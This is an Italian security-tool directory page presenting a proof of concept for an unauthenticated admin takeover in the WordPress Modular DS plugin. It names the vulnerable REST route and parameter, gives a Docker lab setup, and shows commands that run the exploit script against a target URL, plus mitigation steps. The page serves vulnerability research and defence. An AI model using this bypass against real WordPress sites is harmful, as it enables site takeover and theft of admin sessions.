Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-23550-PoC — CVE-2026-23550 - Plugin WordPress Modular DS **Accesso Admin Non Autenticato** | Kitploit
Strumenti/GitHubGitHub/thetorjancaptain/cve-2026-23550-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingAutenticazione
GitHubthetorjancaptain/cve-2026-23550-poc

CVE-2026-23550-PoC

CVE-2026-23550 - Plugin WordPress Modular DS **Accesso Admin Non Autenticato**

Vedi Repository
1218 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-23550-PoC

CVE-2026-23550 - Plugin WordPress Modular DS Accesso Admin Non Autenticato

Status CVSS Affected

Proof-of-Concept (PoC) che dimostra CVE-2026-23550 - critica acquisizione non autenticata dell'account admin nel plugin WordPress Modular DS (versioni ≤2.5.1). Sfruttato attivamente in natura.

Flusso PoC

Riepilogo dell'attacco: Il routing REST API difettoso in /api/modular-connector/login bypassa l'autenticazione WordPress quando origin=mo, concedendo cookie di sessione admin non autenticati.

🚀 Demo Rapida - Se hai già WP configurato

# PoC pronto per la produzione
./CVE-2026-23550-PoC.sh http://target.com

Output:

[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VULNERABILE: Cookie di sessione admin emesso

Nota Tecnica:

L'endpoint REST interessato è accessibile esclusivamente tramite il meccanismo ?rest_route=; l'accesso diretto tramite /wp-json/ potrebbe non essere disponibile. La vulnerabilità consente l'accesso non autenticato senza credenziali o validazione nonce. L'emissione riuscita di un cookie di sessione amministratore WordPress costituisce conferma dello sfruttamento. Questa proof-of-concept non esegue alcuna azione amministrativa. Modular DS versione 2.5.0 viene utilizzata durante i test.


⚙️ Passaggi per la Riproduzione:

Passaggio 1: Directory di laboratorio

mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp

Passaggio 2: Docker Compose

version: "3.9"

services:
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: rootpass
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wpuser
      MYSQL_PASSWORD: wppass
    volumes:
      - db_data:/var/lib/mysql

  wordpress:
    image: wordpress:6.4.3-php8.2-apache
    depends_on:
      - db
    ports:
      - "8080:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wpuser
      WORDPRESS_DB_PASSWORD: wppass
      WORDPRESS_DB_NAME: wordpress
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data:

Passaggio 3: Distribuzione

docker compose up -d
docker compose logs -f db

Attendere: "ready for connections"

Passaggio 4: Installazione WordPress

  • URL: http://localhost:8080
  • Utente admin: admin
  • Password: admin123
  • Titolo del sito: qualsiasi

Passaggio 5: Verifica REST (IMPORTANTE)

curl http://localhost:8080/?rest_route=/

Previsto:

{
  "name": "...",
  "namespaces": [...]
}

Se questo fallisce → FERMATI, l'ambiente è danneggiato.

Passaggio 6: Installare il plugin vulnerabile

wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip

WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/

docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
  /var/www/html/wp-content/plugins/modular-connector

Passaggio 7: Attivare il plugin

  • http://localhost:8080/wp-admin/plugins.php
  • Attivare Modular Connector
  • Ignorare i prompt di onboarding

Passaggio 8: Sfruttamento

chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/

Nota: Se vuoi i cookie in un file di testo, rimuovi "rm -f "$COOKIE_JAR"" dal file poc.sh.

🛡️ Mitigazione

  • Immediata: Disattivare il plugin Modular DS
  • Patch: Aggiornare alla versione 2.5.2+
  • Audit: Verificare la presenza di utenti admin non autorizzati
  • WAF: Bloccare ?rest_route=/api/modular-connector/login

📄 Licenza

Licenza MIT - Solo per ricerca sulla sicurezza e pentest autorizzati. Non per uso dannoso. Divulgare in modo responsabile.

🚨 Avviso Legale

Questo PoC è solo per test di sicurezza autorizzati. L'uso non autorizzato contro sistemi di produzione è illegale. Segnalare i risultati ai manutentori del plugin.

Scarica lo strumento